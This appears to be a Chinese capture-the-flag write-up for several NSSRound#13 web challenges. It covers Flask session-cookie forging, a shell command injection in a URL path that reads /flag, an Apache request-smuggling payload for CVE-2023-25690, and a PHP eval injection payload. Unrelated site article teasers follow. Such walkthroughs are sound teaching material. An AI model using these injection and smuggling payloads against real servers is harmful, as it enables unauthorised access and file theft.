[NSSRound#13 Basic] 刷题记录

news2024/12/26 2:09:50

文章目录

    • [NSSRound#13 Basic]flask?jwt?
    • [NSSRound#13 Basic]ez_factors
    • [NSSRound#13 Basic]flask?jwt?(hard)
    • [NSSRound#13 Basic]信息收集
    • [NSSRound#13 Basic]MyWeb


[NSSRound#13 Basic]flask?jwt?

考点:session伪造

打开题目,想注册admin发现不行(暗示很明显了)
那么我们随便注册一个登陆进去,想拿flag发现不是admin
在这里插入图片描述
猜测这里考点是session伪造
我们在忘记密码的页面找到密钥

在这里插入图片描述然后利用工具flask-session-cookie
先解密

python flask_session_cookie_manager3.py decode -s "th3f1askisfunny" -c ".eJwlzjsOwjAMANC7ZGaI48SOe5nK8UewtnRC3J1KrG96n7LnEeezbO_jikfZX162gmswavTR0k2H0JIq3o0VPZhVeoVkCLyVpyO5VA2WvAXIl3MjcJuVwkiMcZmiVkGqYp4NQyjH8hFIM6F7qC2CCRiu3Gu5I9cZx3_TyvcH8tkwDA.ZPnLwg.GAgeK3Ru7jXj9-2no9xRCYCkhvA"

得到

{'_fresh': True, '_id': '3b573ae452fdca596b909d4c7a3de77a9401f71e309d78d36d90ae79fe3016dbd7261dc806ec69c73bca3a093609cdf23e96f5bd5e368f14deacb61813eda740', '_user_id': '2'}

那么我们想伪造admin的话,猜测_user_id: 1
加密一下

python flask_session_cookie_manager3.py encode -s "th3f1askisfunny" -t "{'_fresh': True, '_id': '3b573ae452fdca596b909d4c7a3de77a9401f71e309d78d36d90ae79fe3016dbd7261dc806ec69c73bca3a093609cdf23e96f5bd5e368f14deacb61813eda740', '_user_id': '1'}"

得到加密后字符串,回到拿flag页面bp抓包
修改session得到flag

在这里插入图片描述

[NSSRound#13 Basic]ez_factors

考点:od命令

打开题目,给了一个超链接
在这里插入图片描述跳转到./factor,并且不难发现114514被分解成质因数
在这里插入图片描述提示了flag在根目录,我们尝试直接读取

/114514;cat /flag

在这里插入图片描述
发现斜杠应该是被过滤了,不然应该跟空格一样

/114514;cat %2fflag

在这里插入图片描述发现只能读出来数字,那么可以使用od命令,把它转换成八进制

/114514;od %2fflag

在这里插入图片描述

脚本

dump = "0000000 051516 041523 043124 062173 030466 062141 034544 026543 0000020 063060 033142 032055 033063 026466 033470 061545 032455 0000040 030064 034146 030461 061144 032463 076541 000012 0000055"
octs = [("0o" + n) for n in  dump.split(" ") if n]
hexs = [int(n, 8) for n in octs]
result = ""
for n in hexs:
    if (len(hex(n)) > 4):
        swapped = hex(((n << 8) | (n >> 8)) & 0xFFFF)
        result += swapped[2:].zfill(4)
print(bytes.fromhex(result).decode())

得到flag
在这里插入图片描述

[NSSRound#13 Basic]flask?jwt?(hard)

考点:session伪造

随便注册一个用户,登录点击拿flag
在这里插入图片描述发现不是admin,回到刚刚拿flag界面,发现有hint
在这里插入图片描述
访问一下,给了我们时间
在这里插入图片描述我们用Flask-Unsign进行cookie解密
发现刚好cookie有对应正确的时间
在这里插入图片描述由于还不知道key
我们尝试随便修改下刚刚的session值,发现报错信息有key

在这里插入图片描述
拿到key后伪造session(在time的值加上单引号)
在这里插入图片描述回到拿flag处,bp抓包修改session值,得到flag
在这里插入图片描述

[NSSRound#13 Basic]信息收集

考点:Apache HTTP Server 请求走私漏洞(CVE-2023-25690)

打开题目没有什么线索
在这里插入图片描述
然后查看网络,发现服务器为Apache/2.4.55 (Unix)
网上搜一下就可以知道存在Apache HTTP Server 请求走私漏洞(CVE-2023-25690)
参考文章

按照参考文章,我们要先去查看conf/httpd.conf是否添加以下模块

LoadModule proxy_module modules/mod_proxy.so
LoadModule proxy_http_module modules/mod_proxy_http.so
LoadModule rewrite_module modules/mod_rewrite.so

由于不知道参数,御剑扫一下得到源码
在这里插入图片描述那么我们就可以读取看上面三个模块是否开启
Apache默认安装httpd.conf在/usr/local/apache2/conf/httpd.conf

?file=/usr/local/apache2/conf/httpd.conf

在这里插入图片描述依次找到,那么我们就可以跟着文章来,进行HTTP走私
本题RewriteRule如下

RewriteEngine on RewriteRule "^/nssctf/(.*)" "http://backend-server:8080/index.php?id=$1" [P] ProxyPassReverse "/nssctf/" "http://backend-server:8080/" 

也就是说路径为./nssctf/,然后根据文章修改payload
原payload

/nssctf/abc%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0aUser-Agent:%20curl/7.68.0%0d%0a%0d%0a' + hexdata + b'GET%20/flag.txt
http://node4.anna.nssctf.cn:28916/nssctf/abc%20HTTP/1.1%0D%0AHost:%20127.0.0.1%0D%0AUser-Agent:%20curl/7.68.0%0D%0A%0D%0AGET%20/flag.txt

会被直接拼接到请求报文中发给后端服务器,造成了请求走私
拼接结果相当于

GET /index.php?file=abc HTTP/1.1
Host: 127.0.0.1
User-Agent: curl/7.68.0

GET /flag.txt

(这里%0d%0a是windows中的换行符)
得到flag在这里插入图片描述

[NSSRound#13 Basic]MyWeb

考点:代码审计

 <?php
error_reporting(E_ALL);
// 写了个网页存储JSON数据,但是还不会处理json格式,这样处理应该没有什么问题吧

if ($_GET['mode'] == 'save') {
    $data = file_get_contents('/tmp/data.json');
    $value = addslashes($_GET['value']);
    $data = str_replace(']', ", '$value']", $data);
    file_put_contents('/tmp/data.json', $data);
} else if ($_GET['mode'] == 'read') {
    $data = file_get_contents('/tmp/data.json');
    eval('$data = ' . $data . ';');
    print_r($data);
} else {
    highlight_file(__FILE__);
} 

分析一下,出题人写了两个模式

  1. save模式下,首先读取/tmp/data.json这个文件,然后addslashes函数防转义(可参考sql注入中防转义),然后添加数值,最后写入进去
  2. read模式下,读取文件,然后eval函数将其解析为 PHP 代码,并将结果赋给 $data 变量。

我们可以在本地测试下
假如json数据为

[1,"Leaf",1234]

如果我们传入value为114514
那么文件内容变为

[1,"Leaf",1234,114514]

在json中注释符为//,所以我们可以注释掉后面的代码
如果要达到命令执行,可以结合换行符和分号。再考虑到防止转义,那么就用反引号绕过
payload

?mode=save&value=]//%0a;echo `cat /flag`;//

执行结果

[1,"Leaf",1234, ']//
;echo `cat/flag`;//']

结果不行
在这里插入图片描述我们将空格url编码一下

?mode=save&value=]//%0a;echo%20`cat%20/flag`;//

得到flag
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1118882.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【C++进阶之路】IO流

文章目录 一、C语言的IO1.键盘与显示屏2. 文件与内存3.字符串与内存 二、CIO1.iostream1.1基本使用1.2operator bool 2. fstream2.1二进制的文件读写2.2字符串的文件读写 3. sstream3.1序列化与反序列化3.2拼接字符串3.3将数据类型转换为字符串 总结 一、C语言的IO 1.键盘与显…

企业知识库软件,快速构建企业知识分享与团队协同的软件

企业知识库是一种特殊的在线协同文档工具&#xff0c;支持包括FAQ、文档、视频、知识图谱等。从本质上讲&#xff0c;它是基于企业知识库软件从而实现内部或外部知识的沉淀、集合、更新、共享等&#xff0c;能为员工或客户提供常见问题的标准回答。 今天我就基于HelpLook &…

STP、堆叠与VRRP如何使用

✍ STP生成树用在哪里&#xff1f; ✍ STP和堆叠有什么区别&#xff1f; ✍ VRRP双网关热备份如何部署&#xff1f; --- 通过交换机组成网络是局域网&#xff0c;连接终端设备的交换机就是接入层交换机。 --- 如上组网结构单一&#xff0c;不需要网工。 容易发生单点故障&…

wireshark数据包内容查找功能详解

wireshark提供通过数据包特征值查找具体数据包的功能&#xff0c;具体查找功能如下&#xff0c; &#xff08;1&#xff09;选择查找目标区域&#xff08;也就是在哪里去匹配特征值&#xff09; 如下图&#xff0c;【分组列表】区域查找指的是在最上方的数据包列表区域查找&…

msvcr110.dll丢失的解决方法介绍,教你如何快速修复问题

在计算机系统中&#xff0c;DLL&#xff08;动态链接库&#xff09;是一种非常重要的资源。它们包含了可被多个程序共享的代码和数据。其中&#xff0c;MSVCR110.dll就是Visual Studio 2012的一个组件。然而&#xff0c;有时候我们可能会遇到“msvcr110.dll丢失”的问题&#x…

2023年传媒行业中期策略 AIGC从三个不同层次为内容产业赋能

基本面和新题材共振&#xff0c;推动传媒互联网行情上涨 AIGC 概念带动&#xff0c;传媒板块领涨 A 股 2023 年第一个交易日&#xff08;1 月 3 日&#xff09;至 6 月 2 日&#xff0c;申万传媒指数区间涨幅高达 48.38%&#xff0c;同时期沪深 300 跌幅为 0.25%&#xff0c;…

【Javascript】构造函数的参数写法

目录 写法一&#xff08;固定参数&#xff09;&#xff1a; 写法二&#xff08;对象类型的参数&#xff09; 写法一&#xff08;固定参数&#xff09;&#xff1a; 如果参数与参数的值不对应 写法一 要求位置严格对应&#xff0c;明确知道对象的属性 写法二&#xff08;对象类…

JavaScript从入门到精通系列第二十二篇:JavaScript中的toString方法和JavaScript中的垃圾回收

文章目录 一&#xff1a;toString方法 1&#xff1a;怪异的返回值[object Object] 2&#xff1a;打印对象成为一个JSON 二&#xff1a;垃圾回收&#xff08;GC&#xff09; 1&#xff1a;垃圾回收概念 2&#xff1a;JS当中的垃圾回收机制 3&#xff1a;JS中的垃圾回收算…

CyclicBarrier线程同步

关于作者&#xff1a; CSDN内容合伙人、技术专家&#xff0c; 从零开始做日活千万级APP&#xff0c;带领团队单日营收超千万。 专注于分享各领域原创系列文章 &#xff0c;擅长java后端、移动开发、商业化变现、人工智能等&#xff0c;希望大家多多支持。 目录 一、导读二、概览…

数据结构与算法—双向链表

目录 一、链表的分类 二、双向链表原理 三、实现双向链表 1、声明链表结构体 2、初始化链表 3、创建新节点 4、打印链表 5、头插&尾插 头插 尾插 6、头删&尾删 头删 尾删 7、 查找节点 8、指定节点前插入 9、删除指定节点 10、销毁链表 完整版 L…

Java三层架构、表现层-业务层-持久层

三层架构 什么是 Java 三层架构 三层架构是指&#xff1a;视图层view&#xff08;表现层&#xff09;&#xff0c;服务层service&#xff08;业务逻辑层&#xff09;&#xff0c;持久层Dao&#xff08;数据访问层&#xff09;&#xff0c; Java的三层架构是指将Java程序分为三…

会议剪影 | 思腾合力携AI服务器亮相PRCV 2023,并作主题演讲

第六届中国模式识别与计算机视觉大会&#xff08;PRCV 2023&#xff09;于2023年10月13日至15日在厦门国际会议中心酒店举办。本届会议主题为“相约鹭岛&#xff0c;启智未来”。 会议旨在汇聚国内国外模式识别和计算机视觉理论与应用研究的广大科研工作者及工业界同行&#xf…

【LeetCode刷题(数据结构与算法)】:将二叉搜索树转化为排序的双向链表

将一个 二叉搜索树 就地转化为一个 已排序的双向循环链表 对于双向循环列表&#xff0c;你可以将左右孩子指针作为双向循环链表的前驱和后继指针&#xff0c;第一个节点的前驱是最后一个节点&#xff0c;最后一个节点的后继是第一个节点 特别地&#xff0c;我们希望可以 就地 完…

pip 时报错 no such option: --bulid-dir 的解决办法

Pycharm 安装第三方库报错及解决方案——no such option: --build-dir Pycharm 安装第三方库报错及解决方案——no such option: --build-dir 最近在学习路径规划相关内容&#xff0c;在运行GitHub上下载例程时缺少“plotly”库&#xff0c;根据网上查到的安装步骤操作&#x…

计算机组成原理 new08 电路 $\color{red}{Δ}$

文章目录 ALU基本逻辑运算复合逻辑的运算 一位全加器串行加法器串行进位的并行加法器并行进位的并行加法器(全先行进位加法器)这个明天再写。加法电路原理总结ALU和加法器有什么关系加法器原理ALU总结无符号整数/补码加减法加法器标志位的生成补码加减法发运算的溢出判断溢出电…

Python实现一个简单的http服务,Url传参输出html页面

摘要 要实现一个可以接收参数的HTTP服务器&#xff0c;您可以使用Python标准库中的http.server模块。该模块提供了一个简单的HTTP服务器&#xff0c;可以用于开发和测试Web应用程序。 下面是一个示例代码&#xff0c;它实现了一个可以接收参数的HTTP服务器&#xff1a; 代码…

C1N短网址 - 是如何做到行业领先的

今天从技术角度来聊下短网址的一些事情&#xff0c;市面上的短网址发展基本上经历了几个阶段。 短网址发展的几个阶段&#xff1a; 第一阶段&#xff1a;网址缩短&#xff0c;很纯粹的功能&#xff0c;各个大小公司都在做&#xff0c;门槛很低。典型代表&#xff1a;百度短网…

Python+playwright 实现Web UI自动化

实现Web UI自动化 技术&#xff1a;Pythonplaywright 目标&#xff1a;自动打开百度浏览器&#xff0c;并搜索“亚运会 金牌榜” 需安装&#xff1a;Playwright &#xff08;不用安装浏览器驱动&#xff09; # 使用浏览器&#xff0c;并可视化打开 browser playwright.ch…

Power BI 傻瓜入门 3. 选择Power BI的版本

本章内容包括&#xff1a; Excel与Power BI的比较选择Power BI的桌面版和服务版之间的差异了解Microsoft提供的许可选项 挑选正确版本的Power BI可能就像参观世界上最大的糖果店&#xff1a;你可以从许多细微差别的替代品中进行选择。选择可以归结为想要、需要、规模&#xf…

用HFSS仿真平面线圈的电感量

用HFSS工具仿真平面线圈的电感量 平面线圈是指在平面上绕制而成的线圈&#xff0c;如PCB上的电感线圈、无线供电使用的金属丝绕制而成的线圈等。根据线圈的不同形状可将平面线圈分为方形线圈&#xff0c;六角形线圈、八角形线圈、螺旋原型线圈等。 网络上的计算平面线圈电感量…